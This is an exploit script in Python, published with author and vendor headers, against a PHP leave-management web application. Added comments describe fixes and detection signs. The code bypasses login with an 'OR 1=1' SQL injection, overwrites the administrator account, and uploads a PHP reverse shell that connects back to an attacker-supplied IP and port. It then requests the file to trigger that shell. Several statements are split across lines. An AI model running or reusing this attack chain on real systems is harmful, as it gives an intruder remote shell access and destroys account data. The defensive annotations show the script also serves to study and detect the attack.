# Date: 24-08-2021
# Exploit Author: Justin White
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html
# Version: V1
# Category: Webapps
# Tested on: Linux
#!/bin/env python3
import requests
import time
import sys
from colorama import Fore, Style
# Script body (kept byte-for-byte: the original has no indentation and
# several statements are split across physical lines).
#
# Read as a proof-of-concept for two weaknesses in the listed application:
#   1. SQL injection in the login handler (/classes/Login.php?f=login) —
#      both credential fields below carry an `OR 1=1` tautology.
#   2. Unrestricted file upload in the user-save handler
#      (/classes/Users.php?f=save), whose `img` field accepts a .php file
#      that is later fetched from /uploads/.
#
# Application-side mitigations: parameterized queries in the login
# handler; server-side allow-listing of upload extension and MIME type
# plus content validation; storing uploads outside the web root (or
# disabling script execution under /uploads); disabling directory
# listing for /uploads.
# Detection: POST bodies to Login.php containing ` OR 1=1`/`-- `
# sequences, a new .php file appearing under /uploads, the admin user
# record being rewritten, and outbound connections from the web server
# to an unexpected host/port.
if len(sys.argv) != 4:
# Usage guard: exactly three positional arguments are expected.
print('python3 script.py <target url> <attacker ip>
<attacker port>')
print('Example: python3 script.py http://127.0.0.1/ 10.0.0.1
4444')
exit()
else:
# Everything below runs under one bare `except:` at the end of the
# script, so any failure is reported only as "Something Went Wrong".
try:
url = sys.argv[1]
attacker_ip = sys.argv[2]
attacker_port = sys.argv[3]
print()
print('[*] Trying to login...')
time.sleep(1)
# Login endpoint the injected credentials are posted to.
login = url + '/classes/Login.php?f=login'
payload_name = "reverse_shell.php"
# PHP file that gets uploaded. Server-side, uploaded files should never
# be served as executable content.
payload_file = r"""<?php exec("/bin/bash -c 'bash -i >&
/dev/tcp/\"{}\"/{} 0>&1'");?>""".format(attacker_ip,
attacker_port)
session = requests.session()
# SQL-injection tautology in both fields: the login query evidently
# interpolates user input. A parameterized query neutralizes this.
post_data = {"username": "'' OR 1=1-- -'", "password": "'' OR 1=1--
-'"}
user_login = session.post(login, data=post_data)
cookie = session.cookies.get_dict()
# Success is decided by an exact match on the JSON response body.
if user_login.text == '{"status":"success"}':
print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + '
Successfully Signed In!')
upload_url = url + "/classes/Users.php?f=save"
cookies = cookie
# Hand-built multipart request with a fixed boundary. Origin and Referer
# are hard-coded to localhost rather than derived from `url`.
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0)
Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language":
"en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate",
"X-Requested-With": "XMLHttpRequest", "Content-Type":
"multipart/form-data;
boundary=---------------------------221231088029122460852571642112",
"Origin": "http://localhost", "Connection": "close", "Referer":
"http://localhost/leave_system/admin/?page=user"}
# Multipart body: rewrites user id 1 (username `admin`, blank password,
# firstname `Adminstrator`) and attaches the PHP file in the `img` field
# with Content-Type application/x-php. Side effect on the target: the
# admin record is overwritten — a useful incident-response artifact.
# The `img` field is where server-side extension/MIME allow-listing and
# content validation belong.
data =
"-----------------------------221231088029122460852571642112\r\nContent-Disposition:
form-data;
name=\"id\"\r\n\r\n1\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition:
form-data;
name=\"firstname\"\r\n\r\nAdminstrator\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition:
form-data;
name=\"lastname\"\r\n\r\nAdmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition:
form-data;
name=\"username\"\r\n\r\nadmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition:
form-data;
name=\"password\"\r\n\r\n\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition:
form-data; name=\"img\"; filename=\"" + payload_name
+"\"\r\nContent-Type: application/x-php\r\n\r\n\n " + payload_file
+
"\n\n\r\n-----------------------------221231088029122460852571642112--\r\n"
print('[*] Trying to Upload Reverse Shell...')
time.sleep(2)
try:
# NOTE: the "Uploaded!" message is printed before the upload request is
# actually sent.
print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Reverse
Shell Uploaded!')
upload = session.post(upload_url, headers=headers, cookies=cookie,
data=data)
# Discovery step relies on directory listing of /uploads being enabled:
# anchors are parsed out of the HTML. Disabling autoindex removes it.
upload_check = f'{url}/uploads'
r = requests.get(upload_check)
if payload_name in r.text:
payloads = r.text.split('<a href="')
# `payload` is only bound when some anchor contains payload_name;
# otherwise the later GET raises NameError, which the bare except
# around it swallows.
for load in payloads:
if payload_name in load:
payload = load.split('"')
payload = payload[0]
else:
pass
else:
exit()
# Bare except: the real failure reason is never shown.
except:
print('[' + Fore.RED + '-' + Style.RESET_ALL + ']' + ' Upload
failed try again in a little bit!!!!!!\n')
exit()
try:
print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Check Your
Listener!\n')
connect_url = url + '/uploads/'
# Fetching the uploaded file is what is expected to trigger it on the
# server; egress from the web server to an unexpected host/port is the
# network-level indicator to alert on.
r = requests.get(connect_url + payload)
except:
print('[' + Fore.RED + '-' + Style.RESET_ALL + ']' + f' Failed to
find reverse shell check {connect_url} or try again!\n')
else:
print('[' + Fore.RED + '-' + Style.RESET_ALL + ']' + ' Login
failed!\n')
except:
print('[' + Fore.YELLOW + '!' + Style.RESET_ALL + ']' + ' Something
Went Wrong!\n')

